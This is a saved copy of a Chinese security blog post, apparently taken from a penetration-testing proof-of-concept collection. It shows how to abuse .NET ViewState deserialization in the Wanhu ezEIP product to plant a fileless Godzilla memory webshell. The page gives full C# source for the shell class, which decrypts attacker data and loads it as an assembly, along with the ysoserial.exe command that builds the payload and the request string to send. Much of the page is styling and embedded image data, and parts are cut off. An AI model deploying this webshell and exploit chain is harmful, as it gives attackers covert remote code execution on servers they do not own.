Penetration_Testing_POC/books/_.Net ViewState反序列化实现无文件哥斯拉内存马(万户ezEip).html

<!DOCTYPE html> <html lang=zh-CN style><!--
 Page saved with SingleFile 
 url: https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html 
--><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1"><link rel=profile href=https://gmpg.org/xfn/11><title>.Net ViewState反序列化实现无文件哥斯拉内存马 – Whwlsfb's Tech Blog</title><meta name=robots content=max-image-preview:large><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » Feed" href=https://blog.wanghw.cn/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » 评论 Feed" href=https://blog.wanghw.cn/comments/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » .Net ViewState反序列化实现无文件哥斯拉内存马 评论 Feed" href=https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html/feed><style>:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}@media(min-width:782px){}@media(max-width:781px){}@media(min-width:782px){}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:0}@supports(position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}@supports(-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media(prefers-reduced-motion:reduce){}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:where(.wp-block-file){margin-bottom:1.5em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}@media(min-width:600px){}@media(min-width:600px){}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image .aligncenter{display:table}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}@supports((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}@media(prefers-reduced-motion:no-preference){}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head runat="server"&gt;
 &lt;title&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
 &lt;form id="form1" runat="server"&gt;
 &lt;div&gt;
 &lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
 &lt;/div&gt;
 &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;%@ Page Language="C#" AutoEventWireup="true" CodeFile="success.aspx.cs" Inherits="member_success" %&gt;

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head runat="server"&gt;
    &lt;title&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;form id="form1" runat="server"&gt;
    &lt;div&gt;
        &lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
    &lt;/div&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre><p id=ufb441563>这个页面非常简单，可以作为完美的特征案例，其中的关键点则是<code>&lt;form id="form1" runat="server"&gt;</code>，其中的<code>runat="server"</code>是必不可少的，这个属性标识了这个form将会支持ASP.net MVC的高级组件，将由服务端来处理、保存状态，并且进行额外的解析操作。<p id=u8021fab0>下一步则需要提取页面中的<code>VIEWSTATEGENERATOR</code>，通常直接访问该页面即可获得。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-xml enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k9>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>html</span><span class=enlighter-text> </span><span class=enlighter-x2>xmlns</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"http://www.w3.org/1999/xhtml"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>body</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>form</span><span class=enlighter-text> </span><span class=enlighter-x2>method</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"post"</span><span class=enlighter-text> </span><span class=enlighter-x2>action</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"./success.aspx"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"form1"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>div</span><span class=enlighter-text> </span><span class=enlighter-x2>class</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"aspNetHidden"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>input</span><span class=enlighter-text> </span><span class=enlighter-x2>type</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"hidden"</span><span class=enlighter-text> </span><span class=enlighter-x2>name</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>value</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></s
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;&lt;title&gt;
&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
 &lt;form method="post" action="./success.aspx" id="form1"&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
&lt;/div&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
&lt;/div&gt;
 &lt;div&gt;
 验证失败！用户：【】不存在
 &lt;/div&gt;
 &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;&lt;title&gt;

&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
    &lt;form method="post" action="./success.aspx" id="form1"&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
&lt;/div&gt;

&lt;div class="aspNetHidden"&gt;

&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
&lt;/div&gt;
    &lt;div&gt;
        验证失败！用户：【】不存在
    &lt;/div&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre><p id=u022d2601>可见该页面的的<code>VIEWSTATEGENERATOR</code>为<code>60AF4XXX</code>，下一步进行Payload生成。<h2 class=wp-block-heading id=c0b82f49>Payload构造</h2><p id=u3acd28be>从<a href=#devco-blog>devco的文章</a>中提到的构造方式为构造一个简单的命令执行回显马然后使用yso.net的ActivitySurrogateSelectorFromFile链生成payload，但是既然能执行任意代码了，构造一个内存马也是同样可以的。<blockquote class=wp-block-quote><p>从.NET 4.8 版本开始，默认开启了类型检查，如出现类型转换错误，则需要使用 ActivitySurrogateDisableTypeCheck链进行 Patch 绕过，绕过后才能正常使用下文中提到的Payload。</p></blockquote><p>通过编写哥斯拉的专用代码，生成序列化数据，携带在请求包之中，便可实现无实体 文件、无内存痕迹的哥斯拉内存马。<p id=ua78d4db8>哥斯拉的内存马的payload代码：<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-csharp enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k0>class</span><span class=enlighter-text> d</span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-k0>public</span><span class=enlighter-text> </span><span class=enlighter-m0>d</span><span class=enlighter-g1>()</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>        System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text> Context = System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text>.</span><span class=enlighter-m3>Current</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        Context.</span><span class=enlighter-m3>Server</span><span class=enlighter-text>.</span><span class=enlighter-m3>ClearError</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        Context.</span><span class=enlighter-m3>Response</span><span class=enlighter-text>.</span><span class=enlighter-m3>Clear</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        </span><span class=enlighter-k1>try</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>        </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> key = </span><span class=enlighter-s0>"3c6e0b8a9c15224a"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> pass = </span><span class=enlighter-s0>"pas"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> md5 = System.</span><span class=enlighter-m3>BitConverter</span><span class=enlighter-text>.</span><span class=enlighter-m3>ToString</span><span class=enlighter-g1>(</span><span class=enlighter-k3>new</span><span class=enlighter-text> System.</span><span class=enlighter-m3>Security</span><span class=enlighter-text>.</span><span class=enlighter-m3>Cryptography</span><span class=enlighter-text>.</span><span class=enlighter-m3>MD5CryptoServiceProvider</span><span class=enlighter-g1
{
 public d()
 {
 System.Web.HttpContext Context = System.Web.HttpContext.Current;
 Context.Server.ClearError();
 Context.Response.Clear();
 try
 {
 string key = "3c6e0b8a9c15224a";
 string pass = "pas";
 string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
 byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
 data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
 if (Context.Session["payload"] == null)
 {
 Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
 }
 else
 {
 System.IO.MemoryStream outStream = new System.IO.MemoryStream();
 object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
 o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
 byte[] r = outStream.ToArray();
 Context.Response.Write(md5.Substring(0, 16));
 Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
 }
 }
 catch (System.Exception) { }
 Context.Response.Flush();
 Context.Response.End();
 }
}</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=csharp data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>class d
{
    public d()
    {
        System.Web.HttpContext Context = System.Web.HttpContext.Current;
        Context.Server.ClearError();
        Context.Response.Clear();
        try
        {
            string key = "3c6e0b8a9c15224a";
            string pass = "pas";
            string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
            byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
            data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
            if (Context.Session["payload"] == null)
            {
                Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
            }
            else
            {
                System.IO.MemoryStream outStream = new System.IO.MemoryStream();
                object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
                o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
                byte[] r = outStream.ToArray();
                Context.Response.Write(md5.Substring(0, 16));
                Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
            }
        }
        catch (System.Exception) { }
        Context.Response.Flush();
        Context.Response.End();
    }
}</pre><p>保存该文件至本地，然后使用如下命令生成payload。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-shell enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg=</span><span class=enlighter-s0>"3DES"</span><span class=enlighter-text> -c=</span><span class=enlighter-s0>"123"</span><span class=enlighter-text> --decryptionkey=</span><span class=enlighter-s0>"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"</span><span class=enlighter-text>  --validationalg=</span><span class=enlighter-s0>"SHA1"</span><span class=enlighter-text> --validationkey=</span><span class=enlighter-s0>"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"</span><span class=enlighter-text> --generator=60AF4XXX -c </span><span class=enlighter-s0>"CHANGEME.cs;System.Web.dll;System.dll"</span></div></div></div><div class="enlighter-raw sf-hidden">ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=shell data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</pre><p>通过使用输出的payload进行拼接，<strong>注意最后的&amp;不能漏掉</strong><div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-raw enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</span></div></div></div><div class="enlighter-raw sf-hidden">__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=raw data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</pre><p>填写至哥斯拉的请求配置中的“左边追加数据”中。<div class=wp-block-image><figure class="aligncenter size-full"><img fetchpriority=high decoding=async width=734 height=780 src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAt4AAAMMCAYAAABkFaDPAAAgAElEQVR4nOzdaXAb930//vcu7pskeF+iRIqUqMuyJFuWZUdO5CN27cZxmrj/HJ5M03+bB2mnDzqdzjT/SScZZyaTybSTJ7+ZpEmmcdzE+aV2Yid26tR2LEeyHFkXdVgH7/sECJIAcezu/wGzaxBcAAsQAK/3a0ZDcLG7+GKx4r73i89+V3j++ecVEBERERFRUZkBoLq6GtXV1WvdFiIiIiKiTWdiYgITExMfBu99+/atdZuIiIiIiDadrq4uTExMQFzrhhARERERbQUM3kREREREJcDgTURERERUAgzeREREREQlwOBNRERERFQCDN5ERERERCXA4E1EREREVAIM3kREREREJWDOZyFJlhFPyEhIEiRZgaKs/q7zgiDAJAowm0ywmESYTDwnICIiIqLNI6/gPReOYiIwj8ngPObCi1iMxlfdELvVAo/LhqoyN6rKPCj3OFa9TiIiIiKi9SK/4L2wiIlACJAllDktMHkcEITsyy31jAsr5lUUQJIkJKQEJgJzsFnMDN5EREREtKnkFbznI4sIhOaxrcqD6nIvfB4XRDF9aYiiKFBkGXIiCkE0w2Sxrnh+dm4BEzMh9E/OodzN0E1ERERExqhlz4KRnuBVLLNaeQXvSDSOhfAinHY/XA47LBZL2kYrigJJkiAlopBmh2F2+CDaapcFdUVR4HTY4HJYEY4sIhKN5fduiIiIiGhLURQFiUQCoijCZDIZXk6WZciyDLPZXLLwnd/FlZKEWDwBURAgikLW0J0IDiExcRPy2BWIDQcge6ohCB8uJwjC0roEAbFEAglJzv8dGTA8PIzx8XF0dHTA5XIVdJ3t7e1wu92IRqO4ceMGfD4ftm3bVpDXKKbp6WlM
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(